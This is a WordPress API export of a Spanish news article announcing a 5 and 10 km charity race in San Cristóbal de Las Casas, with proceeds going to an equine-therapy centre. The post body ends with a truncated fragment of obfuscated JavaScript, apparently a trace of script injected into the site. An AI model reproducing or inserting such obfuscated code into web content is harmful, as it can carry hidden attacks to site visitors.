{"id":24182,"date":"2025-09-25T03:29:43","date_gmt":"2025-09-25T03:29:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24182"},"modified":"2025-09-25T03:29:45","modified_gmt":"2025-09-25T03:29:45","slug":"san-cristobal-se-alista-para-la-carrera-atletica-con-causa-este-27-de-septiembre","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24182","title":{"rendered":"San Crist\u00f3bal se alista para la carrera atl\u00e9tica con causa este 27 de septiembre"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"567\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000350357-1024x567.jpg\" alt=\"\" class=\"wp-image-24183\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000350357-1024x567.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000350357-300x166.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000350357-768x425.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000350357-1536x851.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000350357.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>YolandaRodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>24 de septiembre del 2025. -San Crist\u00f3bal de Las Casas.- Autoridades de la Secretar\u00eda de Seguridad del Pueblo, a trav\u00e9s de la Subsecretar\u00eda Vial Preventiva y de Turismo, anunciaron que este s\u00e1bado 27 de septiembre se llevar\u00e1 a cabo la \u201cCarrera Atl\u00e9tica con Causa\u201d, en el marco del D\u00eda Mundial del Turismo.<\/p>\n\n\n\n<p>El subsecretario Guillermo L\u00f3pez Mur\u00faa inform\u00f3 que la justa deportiva arrancar\u00e1 a las 7:00 de la ma\u00f1ana desde la Plaza Catedral. Habr\u00e1 dos rutas: una de 5 kil\u00f3metros de car\u00e1cter recreativo y otra de 10 kil\u00f3metros para corredores competitivos, ambas recorriendo el Centro Hist\u00f3rico, andadores tur\u00edsticos y barrios tradicionales.<\/p>\n\n\n\n<p>La meta de los organizadores es reunir a cerca de mil corredores. La inscripci\u00f3n tiene un costo de 200 pesos y lo recaudado ser\u00e1 destinado al Centro de Equinoterapia de la Secretar\u00eda de Seguridad, en apoyo a ni\u00f1as y ni\u00f1os que reciben atenci\u00f3n terap\u00e9utica.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n, los organizadores subrayaron que esta carrera no solo promueve el deporte, sino tambi\u00e9n la proyecci\u00f3n tur\u00edstica de San Crist\u00f3bal y del estado. Reconocieron el respaldo del gobernador Eduardo Ram\u00edrez a proyectos que, dijeron, fortalecen la identidad y el orgullo de los chiapanecos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>YolandaRodr\u00edguez\/ corresponsal 24 de septiembre del 2025. -San Crist\u00f3bal de Las Casas.- Autoridades de la Secretar\u00eda de Seguridad del Pueblo, a trav\u00e9s de la Subsecretar\u00eda Vial Preventiva y de Turismo, anunciaron que este s\u00e1bado 27 de septiembre se llevar\u00e1 a cabo la \u201cCarrera Atl\u00e9tica con Causa\u201d, en el marco del D\u00eda Mundial del Turismo. El &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24183,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-24182","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24182","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24182"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24182\/revisions"}],"predecessor-version":[{"id":24184,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24182\/revisions\/24184"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24183"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}